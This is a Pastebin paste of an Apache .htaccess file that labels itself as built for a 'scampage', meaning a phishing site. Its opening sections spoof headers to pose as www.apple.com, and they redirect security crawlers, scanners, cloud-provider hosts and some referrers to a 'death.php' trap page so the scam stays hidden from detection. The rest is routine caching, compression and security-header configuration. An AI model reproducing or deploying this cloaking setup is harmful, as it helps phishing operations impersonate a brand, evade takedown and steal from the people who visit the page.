Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #########################################################################
- # ULTIMATE .htaccess FILE FOR SCAMPAGE & PERFORMANCE #
- #########################################################################
- # @Author: DwixRMX #
- # @Author URI: https://l34kc0de.today #
- # License: GNU General Public License v2 or later #
- # License URI: http://www.gnu.org/licenses/gpl-2.0.html #
- #########################################################################
- # DNThirTeen:[CORE]
- ServerSignature Off
- Options -Indexes
- Options -ExecCGI
- Options -MultiViews
- Options +SymLinksIfOwnerMatch
- IndexIgnore *
- RewriteEngine On
- #AddHandler application/x-httpd-php .dn13 #for custom php extension
- RewriteBase /
- <IfModule mod_headers.c>
- Header set X_FORWARDED_FOR: 104.16.77.187
- Header set REMOTE_ADDR: 104.16.77.187
- Header set Server: www.apple.com
- Header set Host: www.apple.com
- Header set Origin: https://www.apple.com
- Header set Referer: https://www.apple.com
- Header set X-Forwarded-Host: www.apple.com
- Header set X-Forwarded-Proto: https
- </IfModule>
- # DNThirTeen:[USER AGENT]
- <IfModule mod_rewrite.c>
- RewriteEngine On
- RewriteCond %{REQUEST_URI} !(death.php) [NC]
- #list in regex
- RewriteCond %{HTTP_USER_AGENT} (360Spider|acapbot|acoonbot|ahrefs|alexibot|asterias|attackbot|backdorbot|suzuran|takeout|teleport|telesoft|true_robots|turingos|turnit|vampire|vikspider|voideye|webleacher|webreaper|webstripper|webvac|webviewer|webwhacker|winhttp|wwwoffle|woxbot|xaldon|xxxyy|yamanalab|yioopbot|youda|zeus|zmeu|zune|zyborg) [NC]
- RewriteRule .* /death.php?log [L,NE,E=DN13_USER_AGENT:%1]
- </IfModule>
- # DNThirTeen:[REMOTE HOST]
- <IfModule mod_rewrite.c>
- RewriteEngine On
- RewriteCond %{REQUEST_URI} !(death.php) [NC]
- #list in regex
- RewriteCond %{REMOTE_HOST} (163data|amazonaws|colocrossing|crimea|g00g1e|justhost|kanagawa|loopia|masterhost|onlinehome|poneytel|sprintdatacenter|reverse.softlayer|safenet|ttnet|woodpecker|wowrack) [NC]
- RewriteRule .* /death.php?log [L,NE,E=DN13_REMOTE_HOST:%1]
- </IfModule>
- # DNThirTeen:[HTTP REFERRER]
- <IfModule mod_rewrite.c>
- RewriteEngine On
- RewriteCond %{REQUEST_URI} !(death.php) [NC]
- #list in regex
- RewriteCond %{HTTP_REFERER} (ambien|blue\spill|cialis|cocaine|ejaculat|erectile|erections|hoodia|huronriveracres|impotence|levitra|libido|lipitor|phentermin|pro[sz]ac|sandyauer|tramadol|troyhamby|ultram|unicauca|valium|viagra|vicodin|xanax|ypxaieo) [NC]
- RewriteRule .* /death.php?log [L,NE,E=DN13_HTTP_REFERRER:%1]
- </IfModule>
- # DNThirTeen:[MUTATION BLOCKER]
- <Limit GET HEAD OPTIONS POST PUT>
- Order Allow,Deny
- #Deny from 127.0.0.1
- #HateCrewDeathRoll
- Allow from All
- # RewriteRule .* - [F,L]
- </Limit>
- <IfModule mod_rewrite.c>
- RewriteEngine On
- RewriteCond %{HTTPS} !=on
- RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
- </IfModule>
- # ----------------------------------------------------------------------
- # | Compressing and Caching |
- # ----------------------------------------------------------------------
- <IfModule mod_expires.c>
- ExpiresActive on
- ExpiresDefault "access plus 1 month"
- # CSS
- ExpiresByType text/css "access plus 1 year"
- # Data interchange
- ExpiresByType application/atom+xml "access plus 1 hour"
- ExpiresByType application/rdf+xml "access plus 1 hour"
- ExpiresByType application/rss+xml "access plus 1 hour"
- ExpiresByType application/json "access plus 0 seconds"
- ExpiresByType application/ld+json "access plus 0 seconds"
- ExpiresByType application/schema+json "access plus 0 seconds"
- ExpiresByType application/vnd.geo+json "access plus 0 seconds"
- ExpiresByType application/xml "access plus 0 seconds"
- ExpiresByType text/xml "access plus 0 seconds"
- # Favicon (cannot be renamed!) and cursor images
- ExpiresByType image/vnd.microsoft.icon "access plus 1 week"
- ExpiresByType image/x-icon "access plus 1 week"
- # HTML - Behält die Website eine Stunde im Cache, neues wird erst nach Ablauf einer Stunde
- # angezeigt. Wenn nicht gewuenscht, bei 3600 eine Null eintragen
- ExpiresByType text/html "access plus 3600 seconds"
- # JavaScript
- ExpiresByType application/javascript "access plus 1 year"
- ExpiresByType application/x-javascript "access plus 1 year"
- ExpiresByType text/javascript "access plus 1 year"
- # Manifest files
- ExpiresByType application/manifest+json "access plus 1 week"
- ExpiresByType application/x-web-app-manifest+json "access plus 0 seconds"
- ExpiresByType text/cache-manifest "access plus 0 seconds"
- # Media files
- ExpiresByType audio/ogg "access plus 1 month"
- ExpiresByType image/bmp "access plus 1 month"
- ExpiresByType image/gif "access plus 1 month"
- ExpiresByType image/jpeg "access plus 1 month"
- ExpiresByType image/png "access plus 1 month"
- ExpiresByType image/svg+xml "access plus 1 month"
- ExpiresByType image/webp "access plus 1 month"
- ExpiresByType video/mp4 "access plus 1 month"
- ExpiresByType video/ogg "access plus 1 month"
- ExpiresByType video/webm "access plus 1 month"
- # Web fonts
- # Embedded OpenType (EOT)
- ExpiresByType application/vnd.ms-fontobject "access plus 1 month"
- ExpiresByType font/eot "access plus 1 month"
- # OpenType
- ExpiresByType font/opentype "access plus 1 month"
- # TrueType
- ExpiresByType application/x-font-ttf "access plus 1 month"
- # Web Open Font Format (WOFF) 1.0
- ExpiresByType application/font-woff "access plus 1 month"
- ExpiresByType application/x-font-woff "access plus 1 month"
- ExpiresByType font/woff "access plus 1 month"
- # Web Open Font Format (WOFF) 2.0
- ExpiresByType application/font-woff2 "access plus 1 month"
- # Other
- ExpiresByType text/x-cross-domain-policy "access plus 1 week"
- </IfModule>
- <IfModule mod_gzip.c>
- mod_gzip_on Yes
- mod_gzip_dechunk Yes
- mod_gzip_item_include file .(html?|txt|css|js|php|pl)$
- mod_gzip_item_include handler ^cgi-script$
- mod_gzip_item_include mime ^text/.*
- mod_gzip_item_include mime ^application/x-javascript.*
- mod_gzip_item_exclude mime ^image/.*
- mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.*
- </IfModule>
- <IfModule mod_deflate.c>
- # Insert filters / compress text, html, javascript, css, xml:
- AddOutputFilterByType DEFLATE text/plain
- AddOutputFilterByType DEFLATE text/html
- AddOutputFilterByType DEFLATE text/xml
- AddOutputFilterByType DEFLATE text/css
- AddOutputFilterByType DEFLATE text/vtt
- AddOutputFilterByType DEFLATE text/x-component
- AddOutputFilterByType DEFLATE application/xml
- AddOutputFilterByType DEFLATE application/xhtml+xml
- AddOutputFilterByType DEFLATE application/rss+xml
- AddOutputFilterByType DEFLATE application/js
- AddOutputFilterByType DEFLATE application/javascript
- AddOutputFilterByType DEFLATE application/x-javascript
- AddOutputFilterByType DEFLATE application/x-httpd-php
- AddOutputFilterByType DEFLATE application/x-httpd-fastphp
- AddOutputFilterByType DEFLATE application/atom+xml
- AddOutputFilterByType DEFLATE application/json
- AddOutputFilterByType DEFLATE application/ld+json
- AddOutputFilterByType DEFLATE application/vnd.ms-fontobject
- AddOutputFilterByType DEFLATE application/x-font-ttf
- AddOutputFilterByType DEFLATE application/font-woff2
- AddOutputFilterByType DEFLATE application/x-font-woff
- AddOutputFilterByType DEFLATE application/x-web-app-manifest+json font/woff
- AddOutputFilterByType DEFLATE font/woff
- AddOutputFilterByType DEFLATE font/opentype
- AddOutputFilterByType DEFLATE image/svg+xml
- AddOutputFilterByType DEFLATE image/x-icon
- # Exception: Images
- SetEnvIfNoCase REQUEST_URI \.(?:gif|jpg|jpeg|png|svg)$ no-gzip dont-vary
- # Drop problematic browsers
- BrowserMatch ^Mozilla/4 gzip-only-text/html
- BrowserMatch ^Mozilla/4\.0[678] no-gzip
- BrowserMatch \bMSI[E] !no-gzip !gzip-only-text/html
- # Make sure proxies don't deliver the wrong content
- Header append Vary User-Agent env=!dont-vary
- </IfModule>
- #Alternative caching using Apache's "mod_headers", if it's installed.
- #Caching of common files - ENABLED
- <IfModule mod_headers.c>
- <FilesMatch "\.(ico|pdf|flv|swf|js|css|gif|png|jpg|jpeg|txt)$">
- Header set Cache-Control "max-age=2592000, public"
- </FilesMatch>
- </IfModule>
- <IfModule mod_headers.c>
- <FilesMatch "\.(js|css|xml|gz)$">
- Header append Vary Accept-Encoding
- </FilesMatch>
- </IfModule>
- # Set Keep Alive Header
- <IfModule mod_headers.c>
- Header set Connection keep-alive
- </IfModule>
- # If your server don't support ETags deactivate with "None" (and remove header)
- <IfModule mod_expires.c>
- <IfModule mod_headers.c>
- Header unset ETag
- </IfModule>
- FileETag None
- </IfModule>
- <IfModule mod_headers.c>
- <FilesMatch ".(js|css|xml|gz|html|woff|woff2|ttf)$">
- Header append Vary: Accept-Encoding
- </FilesMatch>
- </IfModule>
- # -----------------------------------------------------------------------------
- # HTTP SECURITY HEADER |
- # -----------------------------------------------------------------------------
- ### @see https://scotthelme.co.uk/hardening-your-http-response-headers
- ### UPDATE 2019
- # drop Range header when more than 5 ranges.
- # CVE-2011-3192
- SetEnvIf Range (,.*?){5,} bad-range=1
- RequestHeader unset Range env=bad-range
- # optional logging.
- #CustomLog /log common env=bad-range
- # LIMIT UPLOAD FILE SIZE TO PROTECT AGAINST DOS ATTACK. Bytes, 0-2147483647(2GB)
- LimitRequestBody 2147483647
- # Don't allow any pages to be framed - Defends against CSRF
- Header set X-Frame-Options DENY
- # Only allow JavaScript from the same domain to be run.
- # Don't allow inline JavaScript to run.
- Header set X-Content-Security-Policy "allow 'self';"
- ## No-Referrer-Header
- <IfModule mod_headers.c>
- Header set Referrer-Policy "no-referrer"
- </IfModule>
- ## X-FRAME-OPTIONS-Header
- <IfModule mod_headers.c>
- Header set X-Frame-Options "sameorigin"
- </IfModule>
- ## X-XSS-PROTECTION-Header
- <IfModule mod_headers.c>
- Header set X-XSS-Protection "1; mode=block"
- </IfModule>
- ## X-Content-Type-Options-Header
- <IfModule mod_headers.c>
- Header set X-Content-Type-Options "nosniff"
- </IfModule>
- ## Strict-Transport-Security-Header - if you are using https on your website, comment this block out
- <IfModule mod_headers.c>
- Header set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
- </IfModule>
- ## This prevents that false issued certificates for this website can be used unnoticed. (Experimental)
- ## @see https://tools.ietf.org/html/draft-ietf-httpbis-expect-ct-02
- <IfModule mod_headers.c>
- Header set Expect-CT "enforce, max-age=21600"
- </IfModule>
- # ----------------------------------------------------------------------
- # Webfont access
- # ----------------------------------------------------------------------
- # Allow access from all domains for webfonts.Alternatively you could only whitelist your
- # subdomains like "subdomain.example.com".
- <IfModule mod_headers.c>
- <FilesMatch "\.(ttf|ttc|otf|eot|woff|font.css)$">
- Header set Access-Control-Allow-Origin "*"
- </FilesMatch>
- </IfModule>
- # ----------------------------------------------------------------------
- # Proper MIME type for all files
- # ----------------------------------------------------------------------
- # JavaScript
- # Normalize to standard type (it is sniffed in IE anyways)
- # futher details: tools.ietf.org/html/rfc4329#section-7.2
- AddType application/javascript js jsonp
- AddType application/json json
- #
- # Audio
- #
- AddType audio/ogg oga ogg
- AddType audio/mp4 m4a f4a f4b
- #
- # Video
- #
- AddType video/ogg ogv
- AddType video/mp4 mp4 m4v f4v f4p
- AddType video/webm webm
- AddType video/x-flv flv
- #
- # SVG
- # Required for svg webfonts on iPad
- # futher details: twitter.com/FontSquirrel/status/14855840545
- #
- AddType image/svg+xml svg svgz
- AddEncoding gzip svgz
- #
- # Webfonts
- #
- AddType application/vnd.ms-fontobject eot
- AddType application/x-font-ttf ttf ttc
- AddType font/opentype otf
- AddType application/x-font-woff woff
- #
- # Assorted types
- #
- AddType image/x-icon ico
- AddType image/webp webp
- AddType text/cache-manifest appcache manifest
- AddType text/x-component htc
- AddType application/xml rss atom xml rdf
- AddType application/x-chrome-extension crx
- AddType application/x-opera-extension oex
- AddType application/x-xpinstall xpi
- AddType application/octet-stream safariextz
- AddType application/x-web-app-manifest+json webapp
- AddType text/x-vcard vcf
- AddType application/x-shockwave-flash swf
- AddType text/vtt vtt
- # ----------------------------------------------------------------------
- # End!
- # ----------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement